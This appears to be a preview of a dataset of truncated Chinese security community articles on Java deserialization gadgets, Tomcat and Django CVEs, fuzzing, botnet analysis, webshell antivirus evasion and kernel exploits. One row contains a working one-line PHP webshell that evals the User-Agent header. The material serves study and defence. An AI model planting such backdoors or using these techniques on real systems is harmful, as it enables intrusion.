text
stringlengths
100
9.93M
category
stringclasses
11 values
昨天在挖weblogic漏洞时发现ysoserial更新了一个新的gadget AspectJWeaver,今天分析一下。 # 分析 先看下yso给出的payload package ysoserial.payloads; import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.comm...
社区文章
# 【漏洞分析】Django的两个url跳转漏洞分析:CVE-2017-7233&7234 | ##### 译文声明 本文是翻译文章,文章来源: Nearg1e@同程安全应急响应中心 原文地址:<https://mp.weixin.qq.com/s/8fyAXej2qIQAHqM67MoOUA> 译文仅供参考,具体内容表达以及含义原文为准。 [Django官方News&Event](https://www.djangoproject.com/weblog/2017/apr/04/security-releases/)在4月4日发布了一个安全更新,修复了两个URL跳转的漏洞,一个是urlparse的锅,另一个由长亭科技的安全研究员ph...
社区文章
来源: [Ele7enxxh's Blog](http://ele7enxxh.com/Use-AFL-For-Stagefright-Fuzzing-On-Linux.html) 作者: [ele7enxxh](https://github.com/ele7enxxh) weibo: http://weibo.com/ele7enxxh ## 前言 模糊测试是一种自动向程序传递输入数据并监控其输出的自动化测试技术。通过这种技术,安全人员可以测试程序的可靠性以及识别潜在的安全漏洞。 我们( **360成都安全响应中心** )将对[Stagefright Media Framework](https://quandarypeak.co...
社区文章
# 有米iOS恶意SDK分析 | ##### 译文声明 本文是翻译文章,文章来源:360Nirvanteam@360安全播报 译文仅供参考,具体内容表达以及含义原文为准。 前言: 有米广告平台为业界领先的移动信息服务提供商优蜜科技™所有,总部和研发中心设在广州,在北京设立分支机构。有米广告拥有核心技术及完整知识产权,并获多项国家专利,在用户特征识别、精准投放、客户端防作弊、广告智能投放等关键领域遥遥领先。有米广告瞄准7亿手机用户,致力于为数以万计的企业广告主提供精准的产品营销和品牌推广服务,为应用开发者创造公正和优质的广告收益。 网址是 <https://www.youmi.net/> 前不久SourceDNA的研究人员发现iOS平...
社区文章
# 【工具分享】PCRT:一款自动化检测修复PNG损坏的取证工具 ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 作者:[sherlly_666](http://bobao.360.cn/member/contribute?uid=1319383851) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **简介** **** 工具使用Python2.7编写, 旨在实现检查并自动化修复损坏的PNG图像,可用于恢复取证中提取到的缺失的图片流,或者提取隐藏在PNG图片中的恶意样本。 **具体包括:** 显示图片文件信息 修复PNG文件头错误 修复由于错误的图片长...
社区文章
**作者:fate0 作者博客:<http://blog.fatezero.org/2018/04/15/web-scanner-crawler-03/>** **相关阅读: [《爬虫基础篇[Web 漏洞扫描器]》](https://paper.seebug.org/537/ "《爬虫基础篇\[Web 漏洞扫描器\]》") [《爬虫 JavaScript 篇[Web 漏洞扫描器]》](https://paper.seebug.org/570/ "《爬虫 JavaScript 篇\[Web 漏洞扫描器\]》") [《漏洞扫描技巧篇 [Web 漏洞扫描器]》](https://paper.seebug.org/1018/...
社区文章
作者:RicterZ@云鼎实验室 9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615),在某些场景下,攻击者将分别能通过这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码。 云鼎实验室通过对于漏洞描述,搭建漏洞环境,并对其进行复现。此漏洞为高危漏洞,即使是非默认配置,但是一旦存在漏洞,那么攻击者可以成功上传 Webshell,并控制服务器。 #### 复现 根据描述,...
社区文章
原文来自安全客,作者:360核心安全 原文链接:<https://www.anquanke.com/post/id/106025> 最近,360检测了一种新型攻击,黑客可以利用漏洞伪造算力,进而从矿池中窃取数字货币。 经过分析,我们发现此类攻击利用了一个equihash算法(equihashverify: <https://github.com/joshuayabut/equihashverify>)实现上的逻辑漏洞。该漏洞可导致恶意矿工向z-nomp矿池提交虚假share,从而伪造自己的算力。从矿池中窃取诚实矿工的挖矿成果。由于目前许多新生数字货币均使用equihash算法进行工作量证明,且多数equihash矿池依赖于该eq...
社区文章
# 【技术分享】反侦测的艺术part3:shellcode炼金术 | ##### 译文声明 本文是翻译文章,文章来源:pentest.blog 原文地址:<https://pentest.blog/art-of-anti-detection-3-shellcode-alchemy/> 译文仅供参考,具体内容表达以及含义原文为准。 **** 翻译:[myswsun](http://bobao.360.cn/member/contribute?uid=2775084127) 预估稿费:200RMB 投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bobao....
社区文章
# U2F安全协议分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 U2F,Universal 2nd Factor,通用第二因素,属于2FA的一种,意即在用户名和密码的基础上再增加一种验证手段,以增强用户验证的安全性。 出于研究的用途,笔者买了一支yubico 的usb key,并对其进行了测试和研究。以下是笔者的研究笔记,供对U2F感兴趣的朋友参考。 ## 方法 对于想要测试U2F朋友,yubico已经提供了测试用的网站,网址是: <https://demo.yubico.com/u2f> 在测试网址上可以测试注册和登录功能。 U2F可以理解为一种协议标准,目前该标准由FIDO联盟进行维...
社区文章
# 一、概述 近期阿里云态势感知发现一起中控位于中国香港地区的DDoS恶意攻击事件,通过追踪溯源发现,该DDoS木马是XorDDoS-botnet的新变种,中控域名为:jun6.f3322.net,中控服务器IP是位于中国香港的118.184.43.7。从2017年11月份开始在互联网上活动,持续至今。该木马通过爆破的方式、以及JAVA Struts漏洞来抓取网上肉鸡,然后通过添加自启动服务,和安装RootKit驱动的方式以达到常驻肉鸡电脑。通过与中控服务器通信不断进行更新迭代,而且时刻准备着接受黑客的攻击指令,对国内外的许多用户进行DDoS攻击。 基于阿里云态势感知的大数据平台,我们对该DDoS-botnet组织进行了追踪和简要分...
社区文章
# 【技术分享】WebSocket漏洞与防护详解 | ##### 译文声明 本文是翻译文章,文章来源:securelayer7.net 原文地址:<http://blog.securelayer7.net/owasp-top-10-penetration-testing-soap-application-mitigation/> 译文仅供参考,具体内容表达以及含义原文为准。 **** **** 翻译:[ **Legendervi**](http://bobao.360.cn/member/contribute?uid=2535754239) 预估稿费:120RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿...
社区文章
# 【漏洞预警】SambaBleed:Samba信息泄露漏洞(CVE–2017–12163)预警 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **0x00 事件描述** Samba作为Linux和UNIX系统上实现SMB协议的一个免费软件,在*nix领域有很广泛的应用场景。 日前,360 Gear Team的安全研究员(连一汉,胡智斌)发现Samba SMB1协议存在安全缺陷, **攻击者在拥有Samba账户写入权限的情况下,可以远程泄露目标Samba服务器的内存信息,影响Samba全版本** ,漏洞编号为 **CVE-2017-12163** 。之后,Samba和Goo...
社区文章
# 黑客们的夏天——IoT Dev Hacking Vol.1 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 作者:L.A.M[@Duncan](https://github.com/Duncan "@Duncan") SecTeam ## 0x00:前言 人类社会的发展史就是一部信息的发展史,从人类诞生之初的巫师、商人等职业就可以看出信息之于人类何其重要,这也是为什么美国国安局(NSA)会如此嚣张的窃取全球隐私的原因。互联网的发展加速了信息化的进程,而物联网的飞速发展再次助推了这一原本就处于高速发展态势的信息化进程。现如今,我们生活中几乎无法离开物联网(IoT)和物联网设备(IoT Dev...
社区文章
# 当EL注入遇上Java反序列化 | ##### 译文声明 本文是翻译文章,文章原作者 tint0,文章来源:tint0.com 原文地址:<https://tint0.com/when-el-injection-meets-java-deserialization/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 我在某次渗透测试中,发现目标使用了Java Server Faces(JSF)以及JBOSS Richfaces UI框架。当我使用CVE-2013-2165漏洞攻击目标的Richfaces 4后(请参考我之前的一篇[文章](https://tint0.com/matesctf-2018-wutface...
社区文章
# 全面解读OpenAI推出的多模态GPT-4:准确性提高,支持微软新款必应 ##### 译文声明 本文是翻译文章,文章原作者 OpenAI&TheVerge&Techcrunch,文章来源:https://www.odaily.news/post/5185753 译文仅供参考,具体内容表达以及含义原文为准。 GPT-4 可以接受图像和文本输入,而 GPT-3.5 只接受文本。 GPT-4 在各种专业和学术基准上的表现达到 “人类水平”。例如,它通过了模拟的律师考试,分数约为应试者的前 10% 。 OpenAI 花了 6 个月的时间,利用从对抗性测试项目以及 ChatGPT 中获得的经验,反复调整 GPT-4 ,结果在事实性、可引导...
社区文章
### 前言 不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~ 有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗、D盾、护卫神、云锁等安全软件查杀,在本篇文章中将会介绍一些常用的木马免杀技巧,主要针对安全狗、护卫神、D盾进行免杀~ ### 查杀软件 #### D盾 D盾是一个专门为IIS设计的主动防御的安全性保护软件,它采用以内外防护的方式防止服务器和网站被人入侵,它秉持在正常运行各类网站的情况下,越少的功能,服务器就越安全的理念而设。它具有一句话木马查杀、主动后门拦截、Session保护、CC攻击防御、网页篡改查询、WEB嗅探防御、SQL注入防御、XSS攻击...
社区文章
进入到内网后,首先要对自己当前所处的网络环境有一个清楚地判断,收集到有关当前环境足够多的信息,为接下来的渗透做好准备 PS:文中提到的[PowerSploit](https://github.com/PowerShellMafia/PowerSploit) ## 本机信息 包括操作系统,当前用户权限,内网ip段,杀毒软件,端口开放情况,系统打的补丁,网络状况,共享文件夹等,如果是域内的主机的话,操作系统、补丁、运行的服务、杀软等一般是域管批量用脚本安装的。 ### 本机网络配置 * `ipconfig /all`: ### 操作系统 * 查询操作系统及版本信息,补丁信息等等:`systeminfo` * 查询系统...
社区文章
本人在目前就职企业做安全建设的时间接近3年,从一开始不足20台服务器到现在300+的规模,想跟大家分享一些自己在安全建设上的方法,希望对大家能有所帮助。 之前有过两年多的时间做漏洞审核与应急响应工作,在我之前接触过的可导致服务器被入侵的安全问题中(注意`是可直接导致服务器被入侵的安全问题而非全部安全问题`),至少70%以上是由于高危端口对外开放,弱口令或易猜解口令问题导致的,因为大多时候并没有多少人去针对你的企业去做渗透,更多是黑产的批量扫描,所以我觉得首先做好以下几点可以避免大多数因为服务器被入侵而导致的高级别安全事件: 1.严格的端口访问控制(至少对外的要严格): 我们的服务器绝大部分部署在公有云上,端口限制比较方便,对外的...
社区文章
# 【安全工具】FLARE VM:能够分析Windows恶意软件的虚拟机 | ##### 译文声明 本文是翻译文章,文章来源:www.fireeye.com 原文地址:<https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html> 译文仅供参考,具体内容表达以及含义原文为准。 译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922) 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **一、前言** *...
社区文章
# 2018护网杯预选赛 > TEAM:Lilac * * * ## Pwn ### shoppingcart good的modify函数存在越界读写,.data上有个指针0x202068指向自身,可以modify它来leak程序加载的基址,然后modify存放currency的数组(比如currency[0])在存放currency type的位置伪造指向got表的指针,这里选取了malloc@got,再次modify currency[0]可以拿到libc的地址,然后modify currency[1],让currency[1]的type的内容也就是type[1]指向type[0],最后modify type[1]修改mallo...
社区文章
# 前言 打安洵杯线下的时候有一道`Python`的`SSTI`模板注入的`AWD`题目, 由于之前没有怎么接触过关于`Python`的攻防点, 一度被别人种了`Python 内存马`都还没发现, 等比赛中断发现修补后的题目被打进来后, 查看流量记录才意识到攻击者前面是用的`Flask`内存马打的, 之前看过大概的思路却鸽了一直没学, 这里暂且记录一下相关知识点. # 概念 常用的`Python`框架有`Django`、`Flask`, 这两者都可能存在`SSTI`漏洞. `Python 内存马`利用`Flask`框架中`SSTI`注入来实现, `Flask`框架中在`web`应用模板渲染的过程中用到`render_template...
社区文章
# ReelPhish:一种实时双因素钓鱼工具 | ##### 译文声明 本文是翻译文章,文章原作者 Pan Chan, Trevor Haskell,文章来源:fireeye.com/blog/ 原文地址:<https://www.fireeye.com/blog/threat-research/2018/02/reelphish-real-time-two-factor-phishing-tool.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、基本概念 社会工程学攻击对企业而言始终是一种安全威胁,因为这种攻击活动针对的是最为薄弱的安全环节:人。这种攻击通常会捕捉并存储受害者的用户名及密码,以待攻击者稍后使用...
社区文章
# CVE-2016-0165从补丁到exploit ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 # 1.前言 本来是想分析其他漏洞的,不小心分析错了,就将错就错分析了。分析的环境是Win7 x86。 # 2.补丁分析以及POC构造 漏洞发生在win32k.sys模块的RGNMEMOBJ::vCreate函数中。通过对比打补丁前后可以发现在打补丁之后,在调用ExAllocatePoolWithTag之前添加了ULongAdd和ULongLongToULong这两个函数。 如果之前有分析过windows内核整型溢出漏洞的应该会知道ULongAdd和ULongLongToULong这两个...
社区文章
#### 前言 : 漏洞已经报告给厂商 , 不过厂商并不认为这个是一个严重的漏洞 因为 GitBook 网站在编译 Markdown 的书籍的时候是在 LXC 环境下进行的 其实只是一个虚拟的环境 , 并不能读取到敏感的数据 #### 挖掘过程 : > 漏洞报告 PDF : [https://drive.google.com/file/d/0B3gR_-> XJ9Er3ZnhjSnFReW5PMDA/view?usp=sharing](https://link.jianshu.com?t=https://drive.google.com/file/d/0B3gR_-> XJ9Er3ZnhjSnFReW5PMDA/view?u...
社区文章
# Capstone反汇编引擎数据类型及API分析及示例(四) [Capstone反汇编引擎数据类型及API分析与示例(一)](https://xz.aliyun.com/t/5753 "Capstone反汇编引擎数据类型及API分析与示例\(一\)") [ Capstone反汇编引擎数据类型及API分析及示例(二)](https://xz.aliyun.com/t/5761 " Capstone反汇编引擎数据类型及API分析及示例\(二\)") [ Capstone反汇编引擎数据类型及API分析及示例(三)](https://xz.aliyun.com/t/5772 " Capstone反汇编引擎数据类型及API分析及示例...
社区文章
## 背景 显示从一个大佬那听说一个网站的评论区可能存在xss漏洞,作为一个挖洞界的小萌新肯定兴奋呀,然后.... ## 开始测试 本着小萌新的执着,开始了各种的绕过尝试,然后你就发现了大佬的世界不是我可以想象的。 本来我就是想练习自己的挖洞经验,所以就尝试了很多次很多次。 然后我就在[cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet "cheat-sheet")中看到了这个。 这个是使用了URL编码和HTML编码,解码后得到是 <iframe src="javascript:'%3Cscript%3Ealer...
社区文章
# Day1 XXE之SAXBuilder解析 ### 代码 Day 1 <https://www.ripstech.com/java-security-calendar-2019/> ### 漏洞点 漏洞产生的主要是 **SAXBuilder.build()** 这个函数易受到XXE攻击。SAXBuilder类用于解析xml,攻击者可以上传包含恶意xml的文件来发起XXE攻击。 代码中ImportDocument这个类的作用是从"uploaded_office_doc.odt"文件中读取内容,以zip格式读入。通过对该zip文件中的所有文件进行遍历,判断是否含有content.xml文件。若其中含有content.xml文件,...
社区文章
# 4.bWAPP XML&XPath Injection **前言** XML注入 XXE -"xml external entity injection", 即 "xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 XPath注入 是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在...
社区文章
# Windows Search Indexer本地权限提升漏洞分析 | ##### 译文声明 本文是翻译文章,文章原作者 diffense,文章来源:blog.diffense.co.k 原文地址:<http://blog.diffense.co.kr/2020/03/26/SearchIndexer.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 概述 2020年1月至2月期间,微软修复了Windows Search Indexer(Windows搜索索引器)中存在的多个漏洞。 如上图所示,微软在Windows Search Indexer中发现了众多本地权限提升漏洞。在本文中,我们将分析这些补丁的细节,并分享这...
社区文章
**译者:知道创宇404实验室翻译组 原文链接:<https://intel471.com/blog/privateloader-malware>** 长久以来,安装付费(PPI)恶意软件服务已经成为网络犯罪生态系统不可分割的一部分。恶意软件运营者提供支付、恶意有效载荷和目标信息,负责运行服务的人把分发和传播部分外包出去。可访问性和合适的成本使得恶意软件运营商可以利用这些服务作为一种武器,用于快速、批量和地理定位的恶意软件感染。 通过了解这些服务是如何扩散的,防御者可以更好地识别这些活动,并阻止它们对组织的 IT 堆栈造成严重破坏。本报告重点介绍了 PrivateLoader 模块化下载程序,该下载程序由 C++程式语言编写,连...
社区文章
# 漏洞描述 内核模块`win32kfull.sys`的`win32kfull!xxxClientAllocWindowClassExtraBytes`函数中存在Type Confusion漏洞,利用此漏洞进行越界读写,最终可实现本地提权 官方通报影响的windows版本: Windows 10 Version 1803/1809/1909/2004/20h2 Windows Server, version 1909/20H2(Server Core installation) Windows 10 Version for 32-bit Systems Windows Server 2019 # 漏洞分析 分析Windows版本:w...
社区文章
# S7CommPlus协议研究之动态调试 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 1、概述 [上一篇文章](https://www.anquanke.com/post/id/206579)对S7comm-Plus协议进行了初步研究,算是理论研究了,本篇以核心通信DLL(OMSp_core_managed.dll)为目标,使用动态调试的方式,对协议的握手、加密认证过程进行动态调试,以对通信过程做进一步探索认识。 基于之前的工作已经知道,更高版本的TIA Portal软件对应的OMSp_core_managed.dll版本亦更高、更复杂,因此调试工作使用较低版本的DLL为目标(即选择...
社区文章
# Apache Log4j反序列化详细分析 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 之前分析了shiro的身份认证和反序列化的漏洞,这次以两个漏洞简单地分析下Log4j在使用时未过滤导致的反序列化问题,相信会对反序列化以及数据过滤有更多的理解。 ## 0x01 关于Apache Log4j 在项目中显示相关日志最原始的方式就是在代码段中添加相关打印的语句,这样可以在运行时掌握程序的运行状态。但是这样不仅不方便,而且不美观,不利于代码的查看,所以需要封装一个日志打印的操作类。 Log4j是Apache的开源项目,可以实现对System.out等打印语句的替代,并且...
社区文章
# 谈谈对于XSS跨站脚本攻击的学习 ## 前言 最近学完XXE之后,对于这种恶意代码注入的漏洞提起来兴趣,想着现在正好趁热打铁,学习一下XSS,之前做题的时候看大师傅的wp一愣一愣的,不明白个所以然,这次系统的学习一下,在本文中将介绍有关XSS的知识点以及原理,也会介绍XSS的绕过姿势(这里参考了别的大师傅的思路,也给出了我自己的理解),希望给正在学习XSS的你有帮助。 ## 1.概念 跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的Web安全漏洞,攻击者通过在受害者的浏览器中注入恶意脚本来执行恶意行为。这种攻击通常利用Web应用程序没有对用户输入的数据进行足够的过滤和验证。 ## 2.攻击原理...
社区文章
# GACTF 2020 Vidar-Team Writeup | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## web ### EZFLASK > flask&flask python2 # -*- coding: utf-8 -*- from flask import Flask, request import requests from waf import * import time app = Flask(__name__) @app.route('/ctfhint') def ctf(): hint...
社区文章
# DisplayLink USB显卡软件任意文件写入导致本地权限提升漏洞分析 | ##### 译文声明 本文是翻译文章,文章原作者 almond,文章来源:offsec.almond.consulting 原文地址:<https://offsec.almond.consulting/displaylink-usb-graphics-arbitrary-file-write-eop.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、概述 在DisplayLink USB显卡软件7.9.296.0版本中,我们发现了一个本地特权提升漏洞,该漏洞是由于对日志文件夹的访问权限过大,导致可以滥用DisplayLink USB...
社区文章
[+] Author: evi1m0#sec.ly.com [+] Team: n0tr00t security team [+] From: http://www.n0tr00t.com [+] Create: 2015-12-26 #### DownProxy XSS view-source: http://m.115.com/down_proxy.html function localParam(search, hash) { search = search || window.location.search; hash = hash || window.loca...
社区文章
## 前言 用于后开发的.NET仍然存在。它已与大多数C2框架捆绑在一起,移植了通用工具,添加(然后绕过了)AMSI,并且使用很多妙招来启动非托管代码。但是,加载.NET程序集的过程似乎非常一致。 众所周知,像Cobalt Strike中`execute-assembly`这样的工具极大地提高了从内存中加载.NET程序集的可访问性,很多攻击者在Github上发布代码时都以或这或那的方式使用它。基于这种趋势,蓝队自然而然善于寻找遗留在内存中的文件。但是,作为红队,我们仍然发现,不管目标是托管还是非托管进程,在进程内启动.NET代码的方法似乎一成不变。例如,如果我们希望将代码注入到进程中,那么,即使目标已经是加载了CLR的.NET进程,...
社区文章
当前的恶意软件基本上都会使用加密货币挖矿机功能,有各种挖矿机被植入广告平台,手机设备和服务器的例子。恶意软件的开发者会改变payload来最大化的谋利,所以将挖矿机加入恶意软件中,也是一种趋势或必然。 研究人员最近发现一个复杂的文件感染器,还带有加密货币挖矿功能和蠕虫功能。Trend Micro检测到的是XiaoBa (PE_XIAOBAMINER),该恶意软件确实与XiaoBa勒索软件类非常相似。但是看起来勒索软件的代码好像被重新编写过来,加入了一些加密货币挖矿相关的功能。 文件感染也被视作是一种破坏性很大的功能,因为会感染恶意二进制文件,保持主机代码完整但不执行。比如感染了XiaoBaMiner的calc.exe文件执行...
社区文章
# Angler Exploit Kit介绍(上集) | ##### 译文声明 本文是翻译文章,文章来源:360安全播报 原文地址:<http://researchcenter.paloaltonetworks.com/2016/01/angler-exploit-kit-continues-to-evade-detection-over-90000-websites-compromised/> 译文仅供参考,具体内容表达以及含义原文为准。 漏洞利用工具(EK),可以说是互联网领域最有影响力的恶意工具了,这种恶意软件会持续升级,其功能也会不断增加,只有这样才能绕过安全产品的检测。安全研究专家一直都在不断努力去追踪不同EK家族的变种版...
社区文章
# 利用Firefox 0day传播的macOS恶意软件(Part 3) | ##### 译文声明 本文是翻译文章,文章原作者 objective-see,文章来源:objective-see.com 原文地址:<https://objective-see.com/blog/blog_0x45.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 > 大家可以从[此处](https://objective-> see.com/downloads/malware/Mokes.zip)下载本文分析的恶意样本(密码:`infect3d`),注意别感染自己的系统。 最近有攻击者利用Firefox 0day针对加密货...
社区文章
# 【技术分享】如何绕过Edge、Chrome和Safari的内容安全策略 | ##### 译文声明 本文是翻译文章,文章来源:talosintelligence.com 原文地址:<http://blog.talosintelligence.com/2017/09/vulnerability-spotlight-content.html> 译文仅供参考,具体内容表达以及含义原文为准。 译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922) 预估稿费:180RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **一、前言** **...
社区文章
# noxCTF web writeup ## Reference > What is your reference again? > <http://chal.noxale.com:5000> 打开页面发现: 检查网络请求发现访问了`http://chal.noxale.com:5000/check_from_google`。 将HTTP的Referer头改为www.google.com 得到base64编码的字符串: 解密后得到flag。 ## MyFileUploader > This is my new file uploader server. I bet you can't hack it! > <htt...
社区文章
# 前言 对这段时间学习的 `linux` 内核中的一些简单的利用技术做一个记录,如有差错,请见谅。 相关的文件 https://gitee.com/hac425/kernel_ctf 相关引用已在文中进行了标注,如有遗漏,请提醒。 # 环境搭建 对于 `ctf` 中的 `pwn` 一般都是给一个 `linux` 内核文件 和一个 `busybox` 文件系统,然后用 `qemu` 启动起来。而且我觉得用 `qemu` 调试时 `gdb` 的反应比较快,也没有一些奇奇怪怪的问题。所以推荐用 `qemu` 来调,如果是真实漏洞那 `vmware` 双机调试肯定是逃不掉的 (:_。 ## 编译内核 首先去 `linux` 内核的...
社区文章
# 【技术分享】手把手教你如何完成Ruby ERB模板注入 ##### 译文声明 本文是翻译文章,文章来源:trustedsec.com 原文地址:<https://www.trustedsec.com/2017/09/rubyerb-template-injection/> 译文仅供参考,具体内容表达以及含义原文为准。 译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922) 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **前言:现在Web应用的模板** 现在的Web应用中,许多客户端以及服务器端经常会用...
社区文章
现在可见的几乎所有加密货币和区块链的讨论都源于中本聪的白皮书:《比特币:一种点对点的电子现金系统》Bitcoin: A Peer-to-Peer Electronic Cash System (Satoshi Nakamoto)。 2008 年11月1日,一个密码学邮件组收到了 satoshi@vistomail.com 邮箱发出的这份白皮书,2009年1月3日,中本聪的个人电脑里挖出了50个比特币,并在创世区块里留下一句永不可修改的话: “The Times 03/Jan/2009 Chancellor on brink of second bailout for banks(2009年1月3日,财政大臣正处于实施第二轮银行紧急援...
社区文章
# Mimikatz之DPAPI学习与实践 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 ​ 本文就讲解下Windows下的DPAPI,并且利用mimikatz来解密那些由DPAPI加密的文件。本文使用mimikatz版本2.1.1-20180820,Chrome 版本68.0.3440.106 (Official Build) (64-bit)。 ## 0x01 什么是DPAPI ​ DPAPI 英文全称:Data Protection API ,顾名思义就是用来保护数据的接口。这个接口在windows中大量的使用来加密数据,比如chrome的cookies和login...
社区文章
# tl;dr 本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。 # DNS Out-of-Band 如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。 利用fn_xe_file_target_read_file()的例子: https://vuln.app/getItem?id= 1+and+exists(select+*+from...
社区文章
官网下载的最新版,文件名是 phpMyAdmin-4.8.1-all-languages.zip 问题就出现在了 /index.php 找到55~63行 第61行出现了 include $_REQUEST['target']; 很明显这是LFI的前兆,我们只要绕过55~59的限制就行 第57行限制 target 参数不能以index开头 第58行限制 target 参数不能出现在 $target_blacklist 内 找到 $target_blacklist 的定义: 就在 /index.php 的第50行 只要 target 参数不是 import.php 或 export.php 就行 最后...
社区文章
# Microsoft JET RCE漏洞预警 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 漏洞背景 2018年9月20日 Zero Day Initiative(ZDI)团队已公开披露了Microsoft JET数据库引擎中的一个严重的远程执行代码漏洞。 JET数据库引擎和windows捆绑在一起,并且被多个windows产品所使用。 ## 0x01 漏洞详情 该漏洞是JET数据库引擎中的一个越界(OOB)写入造成的。 微软的OLE DB Provider for JET和Access ODBC仅支持32位,这意味着在64位的主机上无法获得直接利用。 但在64位主机上可以...
社区文章
# How2Heap堆利用学习笔记(一) | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 > > 概述:对Linux下堆利用的学习记录,学习顺序大体是按照shellphish团队的how2heap的流程,尽量每个方面都调试的详尽一些,并结合案例进行分析。 ## 环境准备 使用的是Ubuntu16.04,自带的glibc版本如下 $ file /lib/x86_64-linux-gnu/libc-2.23.so /lib/x86_64-linux-gnu/libc-2.23.so: ELF 64-bit LSB shared object, x86-64, version 1 ...
社区文章
**前言** 本次漏洞挖掘较为基础,由于是第一次写,有不足之处还望各位师傅指点一下 **正文** 通过对目标信息搜集获取到这样一个网站 网站可以用学号进行登录,默认密码为学号后六位 经过一番尝试后登录进入该系统,获取到一份简历 目标站点如下 输入刚才获取到的信息跳转到短信页面 将手机号码修改为自己手机 成功接收到短信 输入验证码点击下一步提示 请发送密码 再次输入验证码 将号码修改为接收短信号码 成功跳转到修改密码界面 修改成功 使用修改后的密码进行登录成功 经过一番尝试后在个人信息处发现一处平行越权,通过修改url可以访问到其他用户身份信息 修改前 修改后 这里比较有意思的是...
社区文章
# 针对家用及SOHO路由器的Novidade EK | ##### 译文声明 本文是翻译文章,文章原作者 trendmicro,文章来源:blog.trendmicro.com 原文地址:<https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 最近我们发现了一个新的[exploit kit](https://www.trendmicro.com/vinfo/us/securit...
社区文章
作者:安比实验室&AnChain.ai 公众号:[安比实验室SECBIT](https://mp.weixin.qq.com/s/YBG8YyPwh374HbGWcUKTdQ "安比实验室SECBIT") > > 安比(SECBIT)实验室创始人郭宇:2009年,中本聪创造了一个虚拟的去中心化新世界。这仿佛是一片流着奶和蜜糖的应许之地,人们欢呼雀跃,蜂拥而至。但与所有的生态系统一样,新世界有生命,就有捕食者。有交易者,就有黑客。区块链上的应用在进化,攻击者也同样,我们给大家展示的是区块链世界不为人知的另一面,暗流涌动。意料之外,也在意料之中。 Last Winner(类 Fomo3D)游戏大火,导致以太坊异常拥堵,Gas 费用暴...
社区文章
<http://webshell.cdxy.me/> <?php date_default_timezone_set('Asia/Shanghai'); echo 'hello xianzhi'; function foo($a) { return eval($a); } echo foo($_SERVER['HTTP_USER_AGENT']); 20180618-09:38:33_f6d5d698e0d61049c2130301f53f62b54bb75baa.sample_L_L_L_L_M 20180618-09:38:27_f6d5d698e0d6...
社区文章
**作者:Lucifaer** **原文链接:[https://lucifaer.com/2020/03/10/Oracle%20Coherence%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2020-2555%EF%BC%89/?from=timeline&isappinstalled=0](https://lucifaer.com/2020/03/10/Oracle%20Coherence%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4...
社区文章
